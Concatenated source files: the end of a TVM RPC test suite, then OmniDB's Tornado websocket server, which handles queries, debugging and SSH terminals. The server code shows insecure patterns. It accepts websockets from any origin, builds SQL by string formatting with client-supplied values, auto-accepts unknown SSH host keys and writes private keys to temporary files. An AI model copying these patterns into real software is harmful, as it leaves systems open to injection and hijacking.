temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
        # start the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
server.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
tracker.terminate()
def _target(host, port, device_key, timeout):
    client = rpc.connect_tracker(host, port)
    remote = client.request(device_key, session_timeout=timeout)
    # Busy-wait so the requested session stays open and the tracker keeps
    # reporting the device as occupied; the parent test terminates this process.
    while True:
        pass
    remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
ws_core.py
|
import threading, time, datetime, json, uuid
from concurrent.futures.thread import ThreadPoolExecutor
import traceback
import tornado.ioloop
import tornado.web
import tornado.websocket
import tornado.template
import tornado.httpserver
from tornado import gen
import ssl,os
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
import OmniDB_app.include.OmniDatabase as OmniDatabase
from enum import IntEnum
from datetime import datetime
import sys
from . import settings
from . import custom_settings
from django.contrib.sessions.backends.db import SessionStore
import logging
logger = logging.getLogger('OmniDB_app.QueryServer')
import os
import platform
import re
from tornado.options import options, define, parse_command_line
from . import ws_chat
from OmniDB.startup import clean_temp_folder
import sqlparse
import pexpect
sys.path.append('OmniDB_app/include')
from OmniDB_app.include import paramiko
from OmniDB_app.include import custom_paramiko_expect
class StoppableThread(threading.Thread):
def __init__(self,p1,p2,p3):
super(StoppableThread, self).__init__(target=p1, args=(self,p2,p3,))
self.cancel = False
def stop(self):
self.cancel = True
class StoppableThreadPool(ThreadPoolExecutor):
    def __init__(self, p_max_workers=custom_settings.THREAD_POOL_MAX_WORKERS, p_tag=None):
        super(StoppableThreadPool, self).__init__(max_workers=p_max_workers)
        # avoid sharing a mutable default dict across all instances
        self.tag = p_tag if p_tag is not None else {}
        self.cancel = False
def stop(self, p_callback=None):
self.cancel = True
if p_callback is not None:
p_callback(self)
    def start(self, p_function, p_argsList=None):
        for p_args in (p_argsList or []):
            self.submit(p_function, self, *p_args)
super(StoppableThreadPool, self).shutdown(True)
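# A minimal usage sketch (illustration only, not part of OmniDB): worker
# functions passed to StoppableThread receive the thread object itself as the
# first argument and are expected to poll its "cancel" flag cooperatively.
def _example_stoppable_worker(self, args, ws_object):
    # "self" is the StoppableThread instance, per the constructor above.
    while not self.cancel:
        time.sleep(0.1)  # do a small unit of work, then re-check the flag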
class request(IntEnum):
Login = 0
Query = 1
Execute = 2
Script = 3
QueryEditData = 4
SaveEditData = 5
CancelThread = 6
Debug = 7
CloseTab = 8
AdvancedObjectSearch = 9
Console = 10
Terminal = 11
Ping = 12
class response(IntEnum):
LoginResult = 0
QueryResult = 1
QueryEditDataResult = 2
SaveEditDataResult = 3
SessionMissing = 4
PasswordRequired = 5
QueryAck = 6
MessageException = 7
DebugResponse = 8
RemoveContext = 9
AdvancedObjectSearchResult = 10
ConsoleResult = 11
TerminalResult = 12
Pong = 13
class debugState(IntEnum):
Initial = 0
Starting = 1
Ready = 2
Step = 3
Finished = 4
Cancel = 5
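# Sketch of the JSON envelope exchanged over the websocket, as read by
# thread_dispatcher below (field names are taken from that code; the concrete
# payload for each request type is an assumption beyond this example):
#   {"v_code": <request>, "v_context_code": <int>, "v_data": <payload>}
_example_ping_message = json.dumps({
    'v_code': int(request.Ping),
    'v_context_code': 0,
    'v_data': None
})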
connection_list = dict([])
def closeTabHandler(ws_object,p_tab_object_id):
try:
tab_object = ws_object.v_list_tab_objects[p_tab_object_id]
del ws_object.v_list_tab_objects[p_tab_object_id]
if tab_object['type'] == 'query':
try:
tab_object['omnidatabase'].v_connection.Cancel(False)
except Exception:
                pass
try:
tab_object['omnidatabase'].v_connection.Close()
except Exception as exc:
                pass
elif tab_object['type'] == 'debug':
tab_object['cancelled'] = True
try:
tab_object['omnidatabase_control'].v_connection.Cancel(False)
except Exception:
                pass
try:
tab_object['omnidatabase_control'].v_connection.Terminate(tab_object['debug_pid'])
except Exception:
                pass
try:
tab_object['omnidatabase_control'].v_connection.Close()
except Exception:
                pass
try:
tab_object['omnidatabase_debug'].v_connection.Close()
except Exception:
                pass
elif tab_object['type'] == 'terminal':
if tab_object['thread']!=None:
tab_object['thread'].stop()
if tab_object['terminal_type'] == 'local':
tab_object['terminal_object'].terminate()
else:
tab_object['terminal_object'].close()
tab_object['terminal_ssh_client'].close()
except Exception as exc:
        pass
def thread_dispatcher(self,args,ws_object):
message = args
v_response = {
'v_code': 0,
'v_context_code': 0,
'v_error': False,
'v_data': 1
}
try:
json_object = json.loads(message)
v_code = json_object['v_code']
v_context_code = json_object['v_context_code']
v_data = json_object['v_data']
v_response['v_context_code'] = v_context_code
#Login request
if v_code == request.Login:
ws_object.v_user_key = v_data
try:
v_session = SessionStore(session_key=v_data)['omnidb_session']
ws_object.v_session = v_session
v_response['v_code'] = response.LoginResult
ws_object.v_list_tab_objects = dict([])
ws_object.terminal_command_list = []
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception:
v_response['v_code'] = response.SessionMissing
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_code == request.Ping:
ws_object.last_ping_time = datetime.now()
v_response['v_code'] = response.Pong
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
#Cancel thread
if v_code == request.CancelThread:
try:
thread_data = ws_object.v_list_tab_objects[v_data]
if thread_data:
if thread_data['type'] == 'advancedobjectsearch':
def callback(self):
try:
self.tag['lock'].acquire()
for v_activeConnection in self.tag['activeConnections']:
v_activeConnection.Cancel(False)
finally:
self.tag['lock'].release()
thread_data['thread_pool'].stop(p_callback=callback)
else:
thread_data['thread'].stop()
thread_data['omnidatabase'].v_connection.Cancel(False)
except Exception as exc:
None;
#Close Tab
elif v_code == request.CloseTab:
for v_tab_close_data in v_data:
closeTabHandler(ws_object,v_tab_close_data['tab_id'])
#remove from tabs table if db_tab_id is not null
if v_tab_close_data['tab_db_id']:
try:
ws_object.v_session.v_omnidb_database.v_connection.Execute('''
delete from tabs
where tab_id = {0}
'''.format(v_tab_close_data['tab_db_id']))
except Exception as exc:
None
else:
try:
#Send Ack Message
v_response['v_code'] = response.QueryAck
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Getting refreshed session
s = SessionStore(session_key=ws_object.v_user_key)
v_session = s['omnidb_session']
ws_object.v_session = v_session
#Check database prompt timeout
if v_data['v_db_index']!=None:
v_timeout = v_session.DatabaseReachPasswordTimeout(v_data['v_db_index'])
if v_timeout['timeout']:
v_response['v_code'] = response.PasswordRequired
v_response['v_data'] = v_timeout['message']
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
return
if v_code == request.Terminal:
#create tab object if it doesn't exist
try:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
except Exception as exc:
tab_object = {
'thread': None,
'terminal_object': None
}
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
start_thread = True
try:
#spawn local terminal
if v_data['v_ssh_id'] == -1:
start_thread = False
v_response['v_code'] = response.MessageException
v_response['v_data'] = 'Feature under development.'
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#if not v_session.v_super_user:
# start_thread = False
# v_response['v_code'] = response.MessageException
# v_response['v_data'] = 'Must be superuser to start a local terminal.'
# ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#else:
# tab_object['terminal_object'] = pexpect.spawn('/bin/bash',encoding='utf-8')
# tab_object['terminal_object'].send(v_data['v_cmd'])
# tab_object['terminal_type'] = 'local'
#spawn remote terminal
else:
v_conn_object = v_session.v_databases[v_data['v_ssh_id']]
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
#ssh key provided
if v_conn_object['tunnel']['key'].strip() != '':
v_file_name = '{0}'.format(str(time.time())).replace('.','_')
v_full_file_name = os.path.join(settings.TEMP_DIR, v_file_name)
with open(v_full_file_name,'w') as f:
f.write(v_conn_object['tunnel']['key'])
client.connect(hostname=v_conn_object['tunnel']['server'],username=v_conn_object['tunnel']['user'],key_filename=v_full_file_name,passphrase=v_conn_object['tunnel']['password'],port=int(v_conn_object['tunnel']['port']))
else:
client.connect(hostname=v_conn_object['tunnel']['server'],username=v_conn_object['tunnel']['user'],password=v_conn_object['tunnel']['password'],port=int(v_conn_object['tunnel']['port']))
tab_object['terminal_ssh_client'] = client
tab_object['terminal_object'] = custom_paramiko_expect.SSHClientInteraction(client,timeout=60, display=False)
tab_object['terminal_object'].send(v_data['v_cmd'])
tab_object['terminal_type'] = 'remote'
except Exception as exc:
start_thread = False
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = str(exc)
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
if start_thread:
v_data['v_context_code'] = v_context_code
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_terminal,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'terminal'
tab_object['tab_id'] = v_data['v_tab_id']
t.start()
if v_code == request.Query or v_code == request.QueryEditData or v_code == request.SaveEditData or v_code == request.AdvancedObjectSearch or v_code == request.Console:
#create tab object if it doesn't exist
try:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
except Exception as exc:
tab_object = { 'thread': None,
'omnidatabase': None,
'database_index': -1,
'inserted_tab': False }
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
None;
try:
v_conn_tab_connection = v_session.v_tab_connections[v_data['v_conn_tab_id']]
#create database object
if (tab_object['database_index']!=v_data['v_db_index'] or
v_conn_tab_connection.v_db_type!=tab_object['omnidatabase'].v_db_type or
v_conn_tab_connection.v_connection.v_host!=tab_object['omnidatabase'].v_connection.v_host or
str(v_conn_tab_connection.v_connection.v_port)!=str(tab_object['omnidatabase'].v_connection.v_port) or
v_conn_tab_connection.v_active_service!=tab_object['omnidatabase'].v_active_service or
v_conn_tab_connection.v_user!=tab_object['omnidatabase'].v_user or
v_conn_tab_connection.v_connection.v_password!=tab_object['omnidatabase'].v_connection.v_password):
v_database_new = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
tab_object['omnidatabase'] = v_database_new
tab_object['database_index'] = v_data['v_db_index']
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
v_data['v_context_code'] = v_context_code
v_data['v_database'] = tab_object['omnidatabase']
#Query request
if v_code == request.Query:
tab_object['tab_db_id'] = v_data['v_tab_db_id']
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_query,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'query'
tab_object['sql_cmd'] = v_data['v_sql_cmd']
tab_object['sql_save'] = v_data['v_sql_save']
tab_object['tab_id'] = v_data['v_tab_id']
#t.setDaemon(True)
t.start()
#Console request
if v_code == request.Console:
v_data['v_tab_object'] = tab_object
t = StoppableThread(thread_console,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'console'
tab_object['sql_cmd'] = v_data['v_sql_cmd']
tab_object['tab_id'] = v_data['v_tab_id']
#t.setDaemon(True)
t.start()
#Query edit data
elif v_code == request.QueryEditData:
t = StoppableThread(thread_query_edit_data,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'edit'
#t.setDaemon(True)
t.start()
#Save edit data
elif v_code == request.SaveEditData:
t = StoppableThread(thread_save_edit_data,v_data,ws_object)
tab_object['thread'] = t
tab_object['type'] = 'edit'
#t.setDaemon(True)
t.start()
#Query Advanced Object Search
elif v_code == request.AdvancedObjectSearch:
v_response = {
'v_code': response.AdvancedObjectSearchResult,
'v_context_code': v_data['v_context_code'],
'v_error': False,
'v_data': 1
}
tab_object['tab_db_id'] = v_data['v_tab_db_id']
v_data['v_tab_object'] = tab_object
v_data['v_sql_dict'] = tab_object['omnidatabase'].AdvancedObjectSearch(v_data['text'], v_data['caseSensitive'], v_data['regex'], v_data['categoryList'], v_data['schemaList'], v_data['dataCategoryFilter'])
t = StoppableThreadPool(
p_tag = {
'activeConnections': [],
'lock': threading.RLock(),
'result': {}
}
)
tab_object['thread_pool'] = t
tab_object['type'] = 'advancedobjectsearch'
tab_object['tab_id'] = v_data['v_tab_id']
v_argsList = []
for v_key1 in v_data['v_sql_dict']:
if v_key1 == 'Data':
for v_key2 in v_data['v_sql_dict'][v_key1]:
v_sql = v_data['v_sql_dict'][v_key1][v_key2]
v_argsList.append([v_key1, v_key2, v_sql, v_data, ws_object])
else:
v_sql = v_data['v_sql_dict'][v_key1]
v_argsList.append([v_key1, None, v_sql, v_data, ws_object])
log_start_time = datetime.now()
log_status = 'success'
try:
#Will block here until thread pool ends
t.start(thread_advancedobjectsearch, v_argsList)
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
v_response['v_data'] = {
'v_duration': v_duration,
'v_result': t.tag['result']
}
except Exception as exc:
log_end_time = datetime.now()
v_duration = GetDuration(log_start_time,log_end_time)
log_status = 'error'
v_response['v_data'] = {
'message' : str(exc).replace('\n','<br>'),
'v_duration': v_duration
}
v_response['v_error'] = True
#If the thread pool wasn't previously cancelled
if not t.cancel:
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Debugger
elif v_code == request.Debug:
#New debugger, create connections
if v_data['v_state'] == debugState.Starting:
try:
v_conn_tab_connection = v_session.v_tab_connections[v_data['v_conn_tab_id']]
v_database_debug = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
v_database_control = OmniDatabase.Generic.InstantiateDatabase(
v_conn_tab_connection.v_db_type,
v_conn_tab_connection.v_connection.v_host,
str(v_conn_tab_connection.v_connection.v_port),
v_conn_tab_connection.v_active_service,
v_conn_tab_connection.v_active_user,
v_conn_tab_connection.v_connection.v_password,
v_conn_tab_connection.v_conn_id,
v_conn_tab_connection.v_alias,
p_conn_string = v_conn_tab_connection.v_conn_string,
p_parse_conn_string = False
)
tab_object = { 'thread': None,
'omnidatabase_debug': v_database_debug,
'omnidatabase_control': v_database_control,
'debug_pid': -1,
'cancelled': False,
'tab_id': v_data['v_tab_id'],
'type': 'debug' }
ws_object.v_list_tab_objects[v_data['v_tab_id']] = tab_object
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Existing debugger, get existing tab_object
else:
tab_object = ws_object.v_list_tab_objects[v_data['v_tab_id']]
v_data['v_context_code'] = v_context_code
v_data['v_tab_object'] = tab_object
# Instead of getting the connection port which can be forwarded, we get the local PostgreSQL port
#v_data['v_port'] = v_session.v_databases[v_data['v_db_index']]['database'].v_port
v_data['v_port'] = v_session.v_databases[v_data['v_db_index']]['database'].v_connection.ExecuteScalar('show port')
t = StoppableThread(thread_debug,v_data,ws_object)
#tab_object['thread'] = t
#t.setDaemon(True)
t.start()
except Exception as exc:
v_response['v_code'] = response.SessionMissing
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
v_response['v_code'] = response.MessageException
v_response['v_data'] = traceback.format_exc().replace('\n','<br>')
#ws_object.write_message(json.dumps(v_response))
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
def thread_dispatcher_terminal_command(self,args,ws_object):
message = args
while True:
ws_object.terminal_lock.acquire()
if self.cancel:
break
while True:
try:
element = ws_object.terminal_command_list.pop(0)
tab_object = ws_object.v_list_tab_objects[element['v_tab_id']]
tab_object['terminal_object'].send(element['v_cmd'])
except Exception:
break
def thread_client_control(self,args,object):
message = args
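    # Prune stale websocket clients: every 5 minutes, drop any client whose
    # last ping is older than 10 minutes (see the Ping handling in thread_dispatcher).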
while True:
time.sleep(300)
for k in list(connection_list.keys()):
client_object = connection_list[k]
try:
if ((datetime.now() - client_object.last_ping_time).total_seconds() > 600):
del connection_list[k]
client_object.close()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
class WSHandler(tornado.websocket.WebSocketHandler):
def open(self):
client_id = str(uuid.uuid4())
self.client_id = client_id
self.last_ping_time = datetime.now()
connection_list[client_id] = self
self.event_loop = tornado.ioloop.IOLoop.instance()
spawn_thread = False
lock = threading.Lock()
self.terminal_lock = lock
self.terminal_lock.acquire()
self.terminal_thread = StoppableThread(thread_dispatcher_terminal_command,'',self)
self.terminal_thread.start()
None
def on_message(self, message):
try:
json_object = json.loads(message)
v_code = json_object['v_code']
v_context_code = json_object['v_context_code']
v_data = json_object['v_data']
spawn_thread = True
if v_code == request.Terminal:
#create tab object if it doesn't exist
try:
tab_object = self.v_list_tab_objects[v_data['v_tab_id']]
#object exists, send new command
spawn_thread = False
self.terminal_command_list.append({'v_tab_id': v_data['v_tab_id'], 'v_cmd': v_data['v_cmd']})
try:
self.terminal_lock.release()
except Exception as exc:
None
except Exception as exc:
None
if spawn_thread:
t = StoppableThread(thread_dispatcher,message,self)
t.start()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
            v_response = {
                'v_code': response.MessageException,
                'v_context_code': 0,
                'v_error': False,
                'v_data': traceback.format_exc().replace('\n','<br>')
            }
            #self.write_message(json.dumps(v_response))
            self.event_loop.add_callback(send_response_thread_safe,self,json.dumps(v_response))
def on_close(self):
try:
#closing terminal thread
try:
self.terminal_thread.stop()
self.terminal_lock.release()
except Exception as exc:
None
#removing client object from list of clients
try:
del connection_list[self.client_id]
except Exception as exc:
None
for k in list(self.v_list_tab_objects.keys()):
closeTabHandler(self,k)
except Exception:
None
def check_origin(self, origin):
return True
def start_wsserver_thread():
t = threading.Thread(target=start_wsserver)
    t.daemon = True
t.start()
import asyncio
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
def start_wsserver():
logger.info('''*** Starting OmniDB ***''')
try:
application = tornado.web.Application([
(r'' + settings.PATH + '/ws', WSHandler),
(r'' + settings.PATH + '/wss',WSHandler),
(r'' + settings.PATH + '/chatws', ws_chat.WSHandler),
(r'' + settings.PATH + '/chatwss',ws_chat.WSHandler)
])
if settings.IS_SSL:
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_ctx.options |= ssl.OP_NO_TLSv1
ssl_ctx.options |= ssl.OP_NO_TLSv1_1
ssl_ctx.load_cert_chain(settings.SSL_CERTIFICATE,
settings.SSL_KEY)
server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_ctx)
else:
server = tornado.httpserver.HTTPServer(application)
#Start thread that controls clients
thread_clients = StoppableThread(thread_client_control,None,None)
thread_clients.start()
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
server.listen(settings.OMNIDB_WEBSOCKET_PORT,address=settings.OMNIDB_ADDRESS)
tornado.ioloop.IOLoop.instance().start()
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def send_response_thread_safe(ws_object,message):
try:
ws_object.write_message(message)
except Exception as exc:
logger.error('''*** Exception ***\n{0}'''.format(traceback.format_exc()))
def GetDuration(p_start, p_end):
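    # Returns a human-readable duration (illustrative examples): sub-second
    # intervals render as e.g. "12.3 ms", longer ones as "01:02:03".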
duration = ''
time_diff = p_end - p_start
if time_diff.days==0 and time_diff.seconds==0:
duration = str(time_diff.microseconds/1000) + ' ms'
else:
days, seconds = time_diff.days, time_diff.seconds
hours = days * 24 + seconds // 3600
minutes = (seconds % 3600) // 60
seconds = seconds % 60
        duration = '{0:02d}:{1:02d}:{2:02d}'.format(hours, minutes, seconds)
return duration
def LogHistory(p_omnidb_database,
p_user_id,
p_user_name,
p_sql,
p_start,
p_end,
p_duration,
p_status,
p_conn_id):
try:
logger.info('''*** SQL Command ***
USER: {0},
START: {1},
END: {2},
DURATION: {3},
STATUS: {4},
COMMAND: {5}'''.format(p_user_name,
p_start.strftime('%Y-%m-%d %H:%M:%S.%f'),
p_end.strftime('%Y-%m-%d %H:%M:%S.%f'),
p_duration,
p_status,
p_sql.replace("'","''")))
p_omnidb_database.v_connection.Execute('''
insert into command_list values (
{0},
(select coalesce(max(cl_in_codigo), 0) + 1 from command_list),
'{1}',
'{2}',
'{3}',
'{4}',
'{5}',
{6})
'''.format(p_user_id,
p_sql.replace("'","''"),
p_start.strftime('%Y-%m-%d %H:%M:%S'),
p_end.strftime('%Y-%m-%d %H:%M:%S'),
p_status,
p_duration,
p_conn_id))
